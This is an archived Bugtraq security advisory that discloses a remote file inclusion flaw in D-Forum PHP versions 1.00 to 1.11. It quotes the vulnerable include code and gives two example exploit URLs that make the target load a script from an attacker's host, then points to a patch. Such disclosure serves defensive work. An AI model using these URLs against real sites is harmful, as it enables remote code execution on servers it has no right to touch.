D-Forum (PHP)
From: Frog Man (leseulfrog@hotmail.com)
Date: 02/16/03
- Previous message: Frog Man: "DotBr (PHP)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Frog Man" <leseulfrog@hotmail.com> To: bugtraq@securityfocus.com Date: Sun, 16 Feb 2003 18:06:15 +0100
Informations :
°°°°°°°°°°°°°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/includes/header.php3 :
---------------------------
<?php
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--------------------------
/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---------------------------
Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with
http://[attacker]/script.txt
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
More details :
°°°°°°°°°°°°°°
(in French) http://www.frog-man.org/tutos/5holes8.txt
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
- Next message: dwheeler@ida.org: "Presentation on Writing Secure Programs for Linux and Unix in Maryland"
- Previous message: Frog Man: "DotBr (PHP)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
